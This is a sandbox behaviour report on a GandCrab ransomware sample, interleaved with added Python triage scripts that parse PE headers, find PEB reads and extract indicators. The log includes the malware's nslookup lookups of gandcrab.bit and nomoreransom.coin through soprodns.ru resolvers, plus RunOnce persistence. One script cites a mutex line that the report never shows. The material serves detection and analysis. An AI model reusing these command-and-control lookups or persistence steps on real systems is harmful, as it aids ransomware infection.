                        Source: C:\Users\user\Desktop\gI5xZdIxUs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: gI5xZdIxUs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Data Obfuscation
Source: Yara match | File source: gI5xZdIxUs.exe, type: SAMPLE
Source: Yara match | File source: 14.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.2.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 20.0.isqmkp.exe.f9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.gI5xZdIxUs.exe.fc60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000014.00000000.322631215.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.272296797.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.307645700.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: gI5xZdIxUs.exe PID: 5280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: isqmkp.exe PID: 5464, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: isqmkp.exe PID: 1572, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe, type: DROPPED
Source: gI5xZdIxUs.exe | Static PE information: section name: .l2
Source: isqmkp.exe.1.dr | Static PE information: section name: .l2
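The two static PE findings above (the DYNAMIC_BASE/NX_COMPAT/NO_SEH flags and the non-standard section name .l2 in both the sample and the dropped copy) can be reproduced without a full PE library. The script below is an added example and is not part of the Joe Sandbox report or of the sample: it reads DllCharacteristics and the section table directly from the headers. Because no sample file ships with the page, a minimal PE32 header image is constructed inline (labelled as such) that carries the same flags and section names the report lists; the list of "common" section names is an illustrative assumption, not a specification.

```python
"""Added example: read DllCharacteristics and section names straight from PE headers.

Not part of the Joe Sandbox report; a minimal header image is constructed inline so
the script runs offline. Pass a real file path as argv[1] to inspect an actual sample.
"""
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

# Names that mainstream linkers emit; anything else (".l2" in this report) deserves a look.
# Assumption: this list is illustrative, not exhaustive.
COMMON_SECTION_NAMES = {
    ".text", ".rdata", ".data", ".idata", ".edata", ".pdata", ".rsrc",
    ".reloc", ".bss", ".tls", ".CRT", ".gfids", ".textbss", ".didat",
}


def parse_pe_headers(data: bytes) -> dict:
    """Return image type, decoded DllCharacteristics and section names of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image (missing MZ)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at optional-header offset 70 in both PE32 and PE32+.
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]
    flags = [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if dllchars & bit]
    sect_table = opt + opt_size  # section headers follow the optional header, 40 bytes each
    names = []
    for i in range(num_sections):
        off = sect_table + 40 * i
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return {
        "image": "PE32" if magic == 0x10B else "PE32+",
        "dll_characteristics": flags,
        "sections": names,
        "unusual_sections": [n for n in names if n not in COMMON_SECTION_NAMES],
    }


def build_sample_pe(section_names, dll_characteristics: int) -> bytes:
    """Constructed PE32 header image (no code, no real sections) for offline testing."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    struct.pack_into("<H", opt, 70, dll_characteristics)
    sections = b"".join(n.encode("ascii").ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sections


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            image = fh.read()
    else:
        # Mirrors this report: DYNAMIC_BASE | NX_COMPAT | NO_SEH and a ".l2" section.
        image = build_sample_pe([".text", ".rdata", ".l2"], 0x0040 | 0x0100 | 0x0400)
    info = parse_pe_headers(image)
    print(info["image"], "flags:", ", ".join(info["dll_characteristics"]))
    print("sections:", info["sections"], "unusual:", info["unusual_sections"])
```

A non-standard section name is a packer or custom-loader hint, not proof of anything on its own; the same check is worth running on the dropped isqmkp.exe to confirm it is the same build, which is what the report's second .l2 line indicates.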
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC682A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,1_2_0FC682A0
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bwduumgtptl (4 occurrences)
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe TID: 5052 | Thread sleep count: 39 > 30
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe TID: 5052 | Thread sleep time: -39000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (21 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Evaded block: after key decision graph_14-1997
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Evaded block: after key decision graph_20-1997
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: EnumDeviceDrivers,K32EnumDeviceDrivers,VirtualAlloc,K32EnumDeviceDrivers,K32GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,1_2_0FC62F50
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: EnumDeviceDrivers,EnumDeviceDrivers,VirtualAlloc,EnumDeviceDrivers,GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,14_2_0F9D2F50
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: EnumDeviceDrivers,EnumDeviceDrivers,VirtualAlloc,EnumDeviceDrivers,GetDeviceDriverBaseNameW,lstrcmpiW,VirtualFree,VirtualFree,20_2_0F9D2F50
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC66C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,1_2_0FC66C90
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC66A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,1_2_0FC66A40
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 14_2_0F9D6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,14_2_0F9D6C90
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 14_2_0F9D6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,14_2_0F9D6A40
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 20_2_0F9D6C90 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,20_2_0F9D6C90
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 20_2_0F9D6A40 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,20_2_0F9D6A40
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | API call chain: ExitProcess graph end node graph_1-1906
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | API call chain: ExitProcess graph end node graph_1-1708
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | API call chain: ExitProcess graph end node graph_1-1717
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | API call chain: ExitProcess graph end node graph_1-1695
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | API call chain: ExitProcess graph end node graph_1-1839
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | API call chain: ExitProcess graph end node graph_1-2153
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | API call chain: ExitProcess graph end node graph_14-1905
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | API call chain: ExitProcess graph end node graph_20-1905
Source: gI5xZdIxUs.exe, 00000001.00000002.537080039.0000000000C7A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC682A0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,1_2_0FC682A0
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC633E0 lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrcpyA,ExitProcess,1_2_0FC633E0
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC65EC0 mov eax, dword ptr fs:[00000030h] 1_2_0FC65EC0
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 14_2_0F9D5EC0 mov eax, dword ptr fs:[00000030h] 14_2_0F9D5EC0
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Code function: 20_2_0F9D5EC0 mov eax, dword ptr fs:[00000030h] 20_2_0F9D5EC0
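The three `mov eax, dword ptr fs:[00000030h]` hits above are the sandbox's "reads the PEB" signal: on 32-bit Windows fs:[0x30] holds the PEB pointer, and the byte at PEB+2 is BeingDebugged, which is what an inlined IsDebuggerPresent check reads. The scanner below is an added example, not code from the report or the sample; it finds the two common 32-bit encodings of that instruction in raw code bytes. The input bytes are constructed to mimic the flagged pattern (the base address 0x0FC65EC0 is only borrowed from the report as a label for the printed offsets).

```python
"""Added example: locate 32-bit PEB reads (mov r32, fs:[0x30]) in raw code bytes.

Not from the report; SAMPLE_CODE is constructed to mimic the
'mov eax, dword ptr fs:[00000030h]' pattern the sandbox flagged, followed by a
read of PEB->BeingDebugged (offset 2). Feed it a dumped .text section to triage a sample.
"""
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # ModRM reg field order
PEB_DISP = b"\x30\x00\x00\x00"  # fs:[0x30] holds the PEB pointer on 32-bit Windows


def find_peb_reads(code: bytes, base: int = 0):
    """Return (address, register, hexbytes) for each mov r32, fs:[0x30] found.

    Two encodings are covered: the short moffs32 form 64 A1 30 00 00 00 (eax only)
    and 64 8B /r with ModRM mod=00, rm=101 (disp32, any register). The scan is linear,
    not a disassembly, so a 0x64 byte inside an immediate can cause a false hit, and the
    SIB form 64 8B 04 25 30 00 00 00 is deliberately not matched here.
    """
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != 0x64:  # FS segment-override prefix
            i += 1
            continue
        if code[i + 1:i + 6] == b"\xA1" + PEB_DISP:
            hits.append((base + i, "eax", code[i:i + 6].hex()))
            i += 6
            continue
        if (i + 7 <= n and code[i + 1] == 0x8B
                and (code[i + 2] & 0xC7) == 0x05 and code[i + 3:i + 7] == PEB_DISP):
            hits.append((base + i, REG32[(code[i + 2] >> 3) & 7], code[i:i + 7].hex()))
            i += 7
            continue
        i += 1
    return hits


# Constructed sample: push ebp; mov ebp,esp; mov eax,fs:[30h]; mov al,[eax+2]; mov ecx,fs:[30h]; ret
SAMPLE_CODE = (
    b"\x55\x8B\xEC"
    + b"\x64\xA1\x30\x00\x00\x00"
    + b"\x8A\x40\x02"
    + b"\x64\x8B\x0D\x30\x00\x00\x00"
    + b"\xC3"
)

if __name__ == "__main__":
    for addr, reg, raw in find_peb_reads(SAMPLE_CODE, base=0x0FC65EC0):
        print(f"{addr:08X}  mov {reg}, fs:[0x30]   ({raw})")
```

A hit is a triage lead, not a verdict: CRT start-up code and inlined IsDebuggerPresent calls in benign binaries read the PEB the same way, so look at what follows the read (BeingDebugged at +2, NtGlobalFlag at +0x68, the loader lists at +0x0C) before calling it anti-debugging. 64-bit code reaches the PEB through gs:[0x60] instead, which this 32-bit scanner does not cover.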
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown (3 occurrences)
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: unknown unknown (15 occurrences)
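Three of the records in this report are the ones an analyst would turn into detections first: the Global\pc_group=...&ransom_id=... mutex listed earlier, the RunOnce value written under HKCU, and the repeated nslookup launches above, which resolve .bit and .coin names (blockchain-root TLDs that no ICANN resolver serves) through an explicit external resolver, so the lookups bypass the host's configured DNS and any internal DNS logging. The script below is an added example, not part of the Joe Sandbox report, that extracts all three from behaviour lines written in the report's own "Source: ... | record" form. The sample lines are constructed to mirror the report's records; the final nslookup of www.example.com against 8.8.8.8 is a constructed benign control, and the TLD list beyond .bit and .coin (.emc, .lib, .bazar, all Emercoin) is an illustrative assumption.

```python
"""Added example: pull GandCrab-style indicators out of sandbox behaviour lines.

Not part of the Joe Sandbox report. SAMPLE_LINES are constructed to mirror the
report's "Mutant created", "Registry value created or modified" and "Process created"
records; the nslookup of www.example.com is a constructed benign control case.
"""
import re

# TLDs resolved through blockchain/alternative DNS roots instead of ICANN resolvers.
# .bit is Namecoin; .coin, .emc, .lib and .bazar are Emercoin. Assumption: illustrative list.
ALT_ROOT_TLDS = {"bit", "coin", "emc", "lib", "bazar"}

MUTEX_RE = re.compile(
    r"Mutant created: .*\\Global\\pc_group=(?P<workgroup>[^&\\]+)&ransom_id=(?P<ransom_id>[0-9a-f]{16})$"
)
NSLOOKUP_RE = re.compile(
    r"Process created: .*\\nslookup\.exe nslookup (?P<name>\S+)(?: (?P<server>\S+))?$"
)
RUNONCE_RE = re.compile(
    r"Registry value created or modified: "
    r"(?P<key>HKEY_[A-Z_]+\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce) (?P<value>\S+)$"
)


def triage(lines):
    """Return de-duplicated findings, in first-seen order, for the three indicator types."""
    findings, seen = [], set()

    def emit(finding):
        key = tuple(sorted(finding.items()))
        if key not in seen:
            seen.add(key)
            findings.append(finding)

    for line in lines:
        line = line.strip()
        if m := MUTEX_RE.search(line):
            # The mutex name carries the victim's workgroup and a per-victim ransom id.
            emit({"type": "mutex", "workgroup": m["workgroup"], "ransom_id": m["ransom_id"]})
        elif m := NSLOOKUP_RE.search(line):
            tld = m["name"].rsplit(".", 1)[-1].lower()
            if tld in ALT_ROOT_TLDS:
                # An explicit resolver argument bypasses the host's configured DNS, so
                # these queries never show up in internal DNS server logs.
                emit({"type": "alt_root_dns", "name": m["name"], "server": m["server"] or ""})
        elif m := RUNONCE_RE.search(line):
            emit({"type": "runonce", "key": m["key"], "value": m["value"]})
    return findings


# Constructed sample input in the report's "Source: <process> | <record>" form.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=342245cbb89b1482",
    r"Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_01",
    r"Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bwduumgtptl",
    r"Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce bwduumgtptl",
    r"Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru",
    r"Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns2.soprodns.ru",
    r"Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.coin dns1.soprodns.ru",
    r"Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup www.example.com 8.8.8.8",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LINES):
        print(finding)
```

Match the RunOnce finding on the key, not on the value name: bwduumgtptl is a random string and will differ on every infected host. The same logic ports directly to Sysmon event ID 1 command lines for the nslookup case; the mutex check needs a sandbox or a handle enumeration on the live host, since Sysmon does not log mutant creation.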
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC63AA0 AllocateAndInitializeSid,GetModuleHandleA,GetProcAddress,FreeSid,1_2_0FC63AA0
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Queries volume information: C:\ VolumeInformation (2 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Queries volume information: C:\ VolumeInformation (2 occurrences)
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC690A0 cpuid 1_2_0FC690A0
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (4 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\isqmkp.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (4 occurrences)
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\gI5xZdIxUs.exe | Code function: 1_2_0FC67330 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,ExitProcess,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,1_2_0FC67330
MITRE ATT&CK Matrix

